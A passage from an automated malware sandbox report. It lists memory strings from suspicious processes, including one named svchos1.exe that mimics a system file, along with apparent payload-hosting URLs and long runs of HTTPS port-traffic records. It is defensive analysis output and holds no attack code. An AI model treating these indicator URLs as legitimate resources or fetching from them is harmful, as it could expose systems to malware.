00000003.00000003.1599734165.0000000000927000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1781414514.000000000093E000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1788323790.0000000000927000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1788323790.000000000093E000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1823828481.000000000093E000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1784129251.0000000000927000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1784129251.000000000093E000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1603400037.0000000000926000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fs-im-kefu.7moor-fs1.com/
Source: SystemProcess18.exe, 00000003.00000003.1596189606.000000000093E000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1580976954.000000000093E000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1587640660.000000000093E000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1623853815.000000000093E000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1707154787.000000000093E000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1599734165.000000000093E000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1781414514.000000000093E000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1788323790.000000000093E000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1823828481.000000000093E000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1784129251.000000000093E000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1603400037.000000000093E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fs-im-kefu.7moor-fs1.com/1
Source: svchos1.exe	String found in binary or memory: https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1728896464326/4.txt
Source: SystemProcess18.exe, 00000003.00000003.1707154787.0000000000927000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1596189606.0000000000927000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1580976954.0000000000927000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1587640660.0000000000927000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1823828481.0000000000926000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1781414514.0000000000927000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1623853815.0000000000926000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1599734165.0000000000927000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1788323790.0000000000927000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1784129251.0000000000927000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1603400037.0000000000926000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1728896464326/4.txt5
Source: SystemProcess18.exe, 00000003.00000003.1490622674.0000000000971000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1707154787.0000000000927000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1596189606.0000000000927000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1784129251.0000000000971000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1480600761.0000000000968000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1644579055.0000000000971000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1641747001.0000000000964000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1706790324.0000000000964000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1781414514.000000000095B000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1599734165.000000000095B000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1474393407.0000000000967000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1484007429.0000000000968000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1634190657.0000000000964000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1580976954.0000000000927000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1497498025.0000000000971000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1787014067.0000000000971000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1637641124.0000000000964000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1706790324.0000000000971000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1587640660.0000000000971000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1587640660.0000000000927000.00000004.00000020.00020000.00000000.sdmp, SystemProcess18.exe, 00000003.00000003.1823828481.0000000000926000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1741001373486/7.txt
Source: powershell.exe, 00000015.00000002.1414449184.0000000005275000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000A.00000002.1343846433.000000000572A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1353874119.00000000060DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1420194361.00000000056CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: svchos1.exe	String found in binary or memory: https://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=715030901&daid=73&hide_close_icon=1&pt_no_auth=1&s_

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50131 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50211 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50177 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50257 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown	Network traffic detected: HTTP traffic on port 50085 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50360 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49971
Source: unknown	Network traffic detected: HTTP traffic on port 50417 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50440 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50325 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50292 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49966
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown	Network traffic detected: HTTP traffic on port 50359 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown	Network traffic detected: HTTP traffic on port 49966 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50189 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50073 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50028 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50303 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50269 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown	Network traffic detected: HTTP traffic on port 50439 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49958
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49955
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49954
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown	Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50337 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50051 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50153 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50405 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown	Network traffic detected: HTTP traffic on port 50235 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49948
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49947
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown	Network traffic detected: HTTP traffic on port 50382 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 50061 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50187 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50026 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50301 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50270 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 50347 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 50335 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 50282 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50407 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50155 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50430 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 50313 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 50143 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50429 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 50083 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49999
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49997
Source: unknown	Network traffic detected: HTTP traffic on port 50121 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49991
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50199 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 50369 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49988
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49987
Source: unknown	Network traffic detected: HTTP traffic on port 50277 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50337
Source: unknown	Network traffic detected: HTTP traffic on port 50420 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50336
Source: unknown	Network traffic detected: HTTP traffic on port 50386 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50338
Source: unknown	Network traffic detected: HTTP traffic on port 50151 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50392 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50116 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50331
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50330
Source: unknown	Network traffic detected: HTTP traffic on port 50225 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50333
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50335
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50334
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50071 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50305 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50106
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50348
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50105
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50347
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50107
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50349
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50109
Source: unknown	Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50340
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50100
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50342
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50341
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50344
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50101
Source: unknown	Network traffic detected: HTTP traffic on port 50243 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50343
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50104
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50103
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50345
Source: unknown	Network traffic detected: HTTP traffic on port 50289 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50128 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50197 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50117
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50359
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50116
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50119
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50118
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50351
Source: unknown	Network traffic detected: HTTP traffic on port 50317 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50350
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50111
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50353
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50110
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50113
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50355
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50112
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50354
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50357
Source: unknown	Network traffic detected: HTTP traffic on port 50374 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50114
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50356
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50360
Source: unknown	Network traffic detected: HTTP traffic on port 50213 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50128
Source: unknown	Network traffic detected: HTTP traffic on port 50419 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50127
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50369
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 50255 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50442 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50120
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50362
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 50093 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50361
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50121
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50363
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50124
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50366
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50123
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50365
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50126
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50368
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50125
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50367
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50048 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50371
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50340 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50315 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50350 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50106 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50267 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50410 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50081 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50362 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50304
Source: unknown	Network traffic detected: HTTP traffic on port 50444 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50303
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50306
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50305
Source: unknown	Network traffic detected: HTTP traffic on port 50173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50307
Source: unknown	Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50014 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50309
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50302
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50301
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50141 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50233 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50315
Source: unknown	Network traffic detected: HTTP traffic on port 50384 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50317
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50316
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50319
Source: unknown	Network traffic detected: HTTP traffic on port 50118 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50318
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50279 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50311
Source: unknown	Network traffic detected: HTTP traffic on port 50394 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50310
